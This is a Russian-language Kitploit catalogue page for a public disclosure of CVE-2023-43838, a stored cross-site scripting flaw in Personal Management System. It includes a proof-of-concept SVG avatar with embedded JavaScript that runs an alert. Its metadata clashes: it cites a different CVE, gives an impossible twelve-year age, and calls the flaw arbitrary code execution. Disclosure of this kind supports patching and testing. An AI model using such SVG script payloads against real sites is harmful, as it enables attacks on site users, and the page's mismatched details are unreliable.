Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-43838 — Public disclosure for CVE-2023-31584. | Kitploit
Инструменты/GitHubGitHub/rootd4ddy/cve-2023-43838
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubrootd4ddy/cve-2023-43838

CVE-2023-43838

Public disclosure for CVE-2023-31584.

Репозиторий
12 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-43838

Уязвимость произвольной загрузки файлов в Personal Management System v1.4.64 позволяет злоумышленникам выполнять произвольный код через загрузку специально созданного SVG-файла в аватар профиля пользователя.


[Дополнительная информация] 1.) Создайте alert.svg со следующим содержимым:

root@kitploit:~
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
    <script type="text/javascript">
       alert("huntr.dev");
    </script>
 </svg>

2.) Разместите .SVG на веб-сервере.

3.) Загрузите .SVG в качестве изображения аватара. 4.) Когда пользователь открывает аватар в отдельной вкладке, JavaScript, сохранённый в .SVG-файле, выполняется.

Ссылки: https://github.com/Volmarg/personal-management-system

Скачать инструмент